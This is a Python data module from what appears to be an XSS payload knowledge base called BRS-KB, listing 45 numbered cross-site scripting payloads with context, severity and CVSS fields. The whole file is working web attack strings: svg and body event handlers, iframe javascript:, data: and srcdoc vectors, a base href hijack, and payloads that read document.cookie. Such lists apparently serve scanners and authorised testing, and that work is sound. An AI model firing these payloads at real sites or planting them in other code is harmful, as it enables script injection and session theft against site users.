#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Basic Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


BASIC_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "basic_046": PayloadEntry(
        payload="<svg onload='alert(1)'>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_047": PayloadEntry(
        payload="<svg onload=alert(String.fromCharCode(88,83,83))>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_048": PayloadEntry(
        payload="<svg onload=prompt(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_049": PayloadEntry(
        payload="<svg onload=confirm(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_050": PayloadEntry(
        payload="<svg onload=alert(1)></svg>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_051": PayloadEntry(
        payload="<svg/onload=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_052": PayloadEntry(
        payload="<svg\nonload=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_053": PayloadEntry(
        payload="<svg\tonload=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_054": PayloadEntry(
        payload='<svg onload=eval("alert(1)")>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_055": PayloadEntry(
        payload='<svg onload=setTimeout("alert(1)",0)>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_056": PayloadEntry(
        payload='<svg onload=Function("alert(1)")()>',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_057": PayloadEntry(
        payload="<svg onload=alert(document.domain)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_058": PayloadEntry(
        payload="<svg onload=alert(document.cookie)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_059": PayloadEntry(
        payload="<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_060": PayloadEntry(
        payload="<svg><animateTransform onbegin=alert(1) attributeName=transform>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_061": PayloadEntry(
        payload="<svg><set onbegin=alert(1) attributeName=x to=1>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_062": PayloadEntry(
        payload='<iframe src="javascript:alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_063": PayloadEntry(
        payload="<iframe src='javascript:alert(1)'>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_064": PayloadEntry(
        payload="<iframe src=javascript:alert(String.fromCharCode(88,83,83))>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_065": PayloadEntry(
        payload="<iframe src=javascript:prompt(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_066": PayloadEntry(
        payload="<iframe src=javascript:confirm(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_067": PayloadEntry(
        payload='<iframe src="data:text/html,<script>alert(1)</script>">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_068": PayloadEntry(
        payload='<iframe src="data:text/html,<svg onload=alert(1)>">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_069": PayloadEntry(
        payload='<iframe src="data:text/html,<img src=x onerror=alert(1)>">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_070": PayloadEntry(
        payload='<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_071": PayloadEntry(
        payload="<iframe onload=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_072": PayloadEntry(
        payload='<iframe onload="alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_073": PayloadEntry(
        payload="<iframe onload='alert(1)'>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_074": PayloadEntry(
        payload="<iframe onerror=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_075": PayloadEntry(
        payload="<iframe src=vbscript:alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_076": PayloadEntry(
        payload="<iframe src=livescript:alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_077": PayloadEntry(
        payload='<iframe srcdoc="<script>alert(1)</script>">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_078": PayloadEntry(
        payload="<body onload='alert(1)'>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_079": PayloadEntry(
        payload="<body onpageshow=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_080": PayloadEntry(
        payload="<body onfocus=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_081": PayloadEntry(
        payload="<body onhashchange=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_082": PayloadEntry(
        payload="<body onpopstate=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_083": PayloadEntry(
        payload="<body onresize=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_084": PayloadEntry(
        payload="<body onscroll=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_085": PayloadEntry(
        payload="<body onunload=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_086": PayloadEntry(
        payload="<body onerror=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_087": PayloadEntry(
        payload="<html onmouseover=alert(1)>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_088": PayloadEntry(
        payload="<head><title>XSS</title></head>",
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_089": PayloadEntry(
        payload='<link rel="stylesheet" href="javascript:alert(1)">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
    "basic_090": PayloadEntry(
        payload='<base href="javascript:alert(1)//">',
        contexts=["html_content"],
        severity="medium",
        cvss_score=5.5,
        description="Basic payload",
        tags=["basic", "script", "img", "svg"],
        waf_evasion=False,
    ),
}
